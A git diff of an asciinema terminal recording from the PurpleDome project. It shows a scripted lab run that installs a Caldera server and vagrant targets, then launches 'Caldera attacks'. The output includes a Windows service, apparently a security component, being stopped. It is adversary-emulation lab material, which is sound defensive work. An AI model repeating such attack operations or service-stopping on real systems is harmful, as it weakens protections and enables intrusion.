Updated core documentation rst files

pull/2/head
Thorsten Sick 4 years ago
parent 39286a82f9
commit 5436768e03

@ -1,167 +1,351 @@
{"version": 2, "width": 203, "height": 24, "timestamp": 1612795107, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}} {"version": 2, "width": 148, "height": 47, "timestamp": 1623220625, "idle_time_limit": 0.5, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.02345, "o", "\u001b]0;thorsten@big: /home/PurpleDome\u0007\u001b[01;32mthorsten@big\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "] [0.016732, "o", "\u001b]0;thorsten@avast: /home/PurpleDome\u0007\u001b[01;32mthorsten@avast\u001b[00m:\u001b[01;34m/home/PurpleDome\u001b[00m$ "]
[5.660723, "o", "python3 experiment_control.py run"] [1.249977, "o", "python3 ./experiment_control.py -v run"]
[7.06582, "o", "\r\n"] [1.8469, "o", "\r\n"]
[44.774933, "o", "\u001b[94mInstalling Caldera server \u001b[0m\r\n"] [1.989824, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"]
[46.671437, "o", "Connecting to vagrant@127.0.0.1:2222\r\n"] [1.98994, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"]
[46.674896, "o", "<Connection host=127.0.0.1 user=vagrant port=2222>\r\n\u001b[92mCaldera server installed \u001b[0m\r\n"] [44.497129, "o", "\u001b[94mInstalling Caldera server \u001b[0m\r\n\u001b[92mCaldera server installed \u001b[0m\r\n"]
[46.74413, "o", "fatal: destination path 'caldera' already exists and is not an empty directory.\r\n"] [46.148337, "o", "zsh:cd:1: no such file or directory: None\r\n"]
[47.578068, "o", "Defaulting to user installation because normal site-packages is not writeable\r\n"] [46.152243, "o", "fatal: destination path 'caldera' already exists and is not an empty directory.\r\n"]
[47.684336, "o", "Requirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\n"] [46.60299, "o", "Defaulting to user installation because normal site-packages is not writeable\r\n"]
[47.684553, "o", "Requirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\n"] [46.65791, "o", "Requirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\n"]
[47.685026, "o", "Requirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\n"] [46.658396, "o", "Requirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\n"]
[47.685451, "o", "Requirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\n"] [46.658948, "o", "Requirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\n"]
[47.685891, "o", "Requirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\n"] [46.659644, "o", "Requirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\n"]
[47.686378, "o", "Requirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\n"] [46.660103, "o", "Requirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\n"]
[47.686752, "o", "Requirement already satisfied: cryptography==2.8 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\n"] [46.660601, "o", "Requirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\n"]
[47.687137, "o", "Requirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\n"] [46.661215, "o", "Requirement already satisfied: cryptography==2.8 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\n"]
[47.687526, "o", "Requirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\n"] [46.661805, "o", "Requirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\n"]
[47.688051, "o", "Requirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\n"] [46.662547, "o", "Requirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\n"]
[47.688487, "o", "Requirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\n"] [46.66313, "o", "Requirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\n"]
[47.688879, "o", "Requirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\n"] [46.663676, "o", "Requirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\n"]
[47.68924, "o", "Requirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\n"] [46.664321, "o", "Requirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\n"]
[47.689738, "o", "Requirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\n"] [46.664861, "o", "Requirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\n"]
[47.690142, "o", "Requirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\n"] [46.665769, "o", "Requirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\n"]
[47.690584, "o", "Requirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\n"] [46.666323, "o", "Requirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\n"]
[47.690978, "o", "Requirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\n"] [46.675298, "o", "Requirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\n"]
[47.691419, "o", "Requirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\n"] [46.675664, "o", "Requirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\n"]
[47.691924, "o", "Requirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\n"] [46.676383, "o", "Requirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\n"]
[47.692325, "o", "Requirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\n"] [46.676888, "o", "Requirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\n"]
[47.722896, "o", "Requirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\n"] [46.677518, "o", "Requirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\n"]
[47.723041, "o", "Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\n"] [46.694408, "o", "Requirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-packages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\n"]
[47.725655, "o", "Requirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\n"] [46.705625, "o", "Requirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\n"]
[47.734457, "o", "Requirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (0.57.0)\r\n"] [46.706241, "o", "Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\n"]
[47.734806, "o", "Requirement already satisfied: requests!=2.18.0,>=2.14.2 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (2.24.0)\r\n"] [46.719201, "o", "Requirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\n"]
[47.738412, "o", "Requirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-packages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\n"] [46.719573, "o", "Requirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\n"]
[47.740542, "o", "Requirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\n"] [46.720224, "o", "Requirement already satisfied: requests>=2.5.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.24.0)\r\n"]
[47.757208, "o", "Requirement already satisfied: docutils>=0.11 in /usr/lib/python3/dist-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.16)\r\n"] [46.720647, "o", "Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\n"]
[47.757506, "o", "Requirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\n"] [46.721477, "o", "Requirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\n"]
[47.759656, "o", "Requirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\n"] [46.722037, "o", "Requirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\n"]
[47.774274, "o", "Requirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\n"] [46.722637, "o", "Requirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"]
[47.774601, "o", "Requirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\n"] [46.723175, "o", "Requirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.1.0)\r\n"]
[47.775084, "o", "Requirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"] [46.723793, "o", "Requirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\n"]
[47.77542, "o", "Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\n"] [46.72433, "o", "Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\n"]
[47.775722, "o", "Requirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] [46.724817, "o", "Requirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"]
[47.77616, "o", "Requirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\n"] [46.725408, "o", "Requirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\n"]
[47.776757, "o", "Requirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"] [46.725894, "o", "Requirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\n"]
[47.777259, "o", "Requirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.4)\r\n"] [46.726375, "o", "Requirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.5)\r\n"]
[47.777573, "o", "Requirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\n"] [46.727076, "o", "Requirement already satisfied: docutils>=0.12 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.16)\r\n"]
[47.777865, "o", "Requirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\n"] [46.731192, "o", "Requirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\n"]
[47.778304, "o", "Requirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\n"] [46.744698, "o", "Requirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\n"]
[47.778749, "o", "Requirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\n"] [46.753132, "o", "Requirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (line 14)) (0.57.0)\r\n"]
[47.779242, "o", "Requirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\n"] [46.75779, "o", "Requirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\n"]
[47.785233, "o", "Requirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\n"] [46.75982, "o", "Requirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\n"]
[47.785653, "o", "Requirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\n"] [46.763264, "o", "Requirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\n"]
[47.804144, "o", "Requirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n"] [46.763892, "o", "Requirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\n"]
[48.236742, "o", "WARNING: You are using pip version 20.3.3; however, version 21.0.1 is available.\r\nYou should consider upgrading via the '/usr/bin/python3 -m pip install --upgrade pip' command.\r\n"] [46.779935, "o", "Requirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n"]
[48.287567, "o", "\u001b[94mStarting Caldera server \u001b[0m\r\nConnecting to vagrant@127.0.0.1:2222\r\n"] [47.114079, "o", "Command exited with status 0.\r\n=== stdout ===\r\nDefaulting to user installation because normal site-packages is not writeable\r\nRequirement already satisfied: aiohttp-jinja2==1.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 1)) (1.2.0)\r\nRequirement already satisfied: aiohttp==3.6.2 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 2)) (3.6.2)\r\nRequirement already satisfied: aiohttp_session==2.9.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 3)) (2.9.0)\r\nRequirement already satisfied: aiohttp-security==0.4.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 4)) (0.4.0)\r\nRequirement already satisfied: jinja2==2.10.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 5)) (2.10.3)\r\nRequirement already satisfied: pyyaml>=5.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 6)) (5.3.1)\r\nRequirement already satisfied: cryptography==2.8 in /h"]
[48.28936, "o", "<Connection host=127.0.0.1 user=vagrant port=2222>\r\n"] [47.114214, "o", "ome/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 7)) (2.8)\r\nRequirement already satisfied: websockets==8.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 8)) (8.1)\r\nRequirement already satisfied: Sphinx==3.0.4 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 9)) (3.0.4)\r\nRequirement already satisfied: sphinx_rtd_theme==0.4.3 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 10)) (0.4.3)\r\nRequirement already satisfied: recommonmark==0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 11)) (0.6.0)\r\nRequirement already satisfied: marshmallow==3.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 12)) (3.5.1)\r\nRequirement already satisfied: dirhash==0.1.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 13)) (0.1.1)\r\nRequirement already satisfied: docker==4.2.0 in /home/vagrant/.local/lib/p"]
[58.373838, "o", "0 Trying to connect to http://192.168.178.83:8888 Caldera API\r\n"] [47.114265, "o", "ython3.8/site-packages (from -r requirements.txt (line 14)) (4.2.0)\r\nRequirement already satisfied: donut-shellcode==0.9.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 15)) (0.9.2)\r\nRequirement already satisfied: marshmallow-enum==1.5.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 16)) (1.5.1)\r\nRequirement already satisfied: ldap3==2.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 17)) (2.8.1)\r\nRequirement already satisfied: lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\nRequirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\nRequirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\nRequirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-pac"]
[58.450802, "o", "Caldera: All systems nominal\r\n\u001b[92mCaldera server started \u001b[0m\r\n\u001b[94mpreparing target target1 ....\u001b[0m\r\n"] [47.114305, "o", "kages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\nRequirement already satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\nRequirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\nRequirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\nRequirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\nRequirement already satisfied: requests>=2.5.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.24.0)\r\nRequirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\nRequirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx=="]
[58.450913, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] [47.114341, "o", "3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\nRequirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\nRequirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\nRequirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.1.0)\r\nRequirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\nRequirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\nRequirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\nRequirement already satisfied: sphinxcontrib-jsmath in /home/vagrant/.local/lib/"]
[108.496761, "o", "\u001b[92mMachine created: target1\u001b[0m\r\n"] [47.114379, "o", "python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\nRequirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\nRequirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.5)\r\nRequirement already satisfied: docutils>=0.12 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.16)\r\nRequirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\nRequirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\nRequirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (li"]
[108.49695, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] [47.114445, "o", "ne 14)) (0.57.0)\r\nRequirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\nRequirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\nRequirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\nRequirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\nRequirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\nfatal: destination path 'caldera' already exists and is not an empty directory.\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\nfatal: destination path 'caldera' already"]
[110.577613, "o", "\u001b[92mTarget running: target1 \u001b[0m\r\n\u001b[94mpreparing target target2 ....\u001b[0m\r\n"] [47.114492, "o", " exists and is not an empty directory.\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"]
[113.61404, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] [47.29882, "o", "None\r\n"]
[113.647142, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] [57.386237, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"]
[241.860699, "o", "\u001b[92mTarget running: target2 \u001b[0m\r\n\u001b[94mContacting caldera agents on all targets ....\u001b[0m\r\n"] [57.39097, "o", "\u001b[94mpreparing target target2 ....\u001b[0m\r\n"]
[241.864951, "o", "List agents: ['target2w']\r\nConnecting to caldera http://192.168.178.83:8888, running agents are: ['target2w']\r\nMissing agent: target1 ...\r\n"] [57.394121, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"]
[241.864985, "o", "\r\nnohup /vagrant/target1/caldera_agent.sh start &\r\n \r\n\u001b[94mStarting Caldera client \u001b[0m\r\n"] [57.394259, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"]
[243.37839, "o", "Connecting to vagrant@127.0.0.1:2200\r\n"] [58.061945, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"]
[243.380729, "o", "<Connection host=127.0.0.1 user=vagrant port=2200>\r\n"] [58.062104, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"]
[243.970575, "o", "\u001b[92mCaldera client started \u001b[0m\r\n"] [365.815169, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"]
[248.98351, "o", "List agents: ['target2w', 'target1']\r\n\u001b[92mCaldera agents reached\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\nAttacking machine with PAW: target1\r\n"] [366.127765, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"]
[249.07589, "o", "\u001b[92mExecuted attack operation\u001b[0m\r\n"] [366.43231, "o", " 1 file(s) copied.\r\r\n"]
[249.078827, "o", ".\r\n"] [366.448343, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"]
[250.084198, "o", ".\r\n"] [366.528428, "o", "\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 3 STOP_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x1\r\r\n WAIT_HINT : 0x2bf20\r\r\n"]
[251.089392, "o", ".\r\n"] [366.549334, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 3 STOP_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x1\r\r\n WAIT_HINT : 0x2bf20\r\n\r\n(no stderr)\r\n"]
[252.095383, "o", ".\r\n"] [371.585517, "o", " 1 file(s) copied.\r\r\n"]
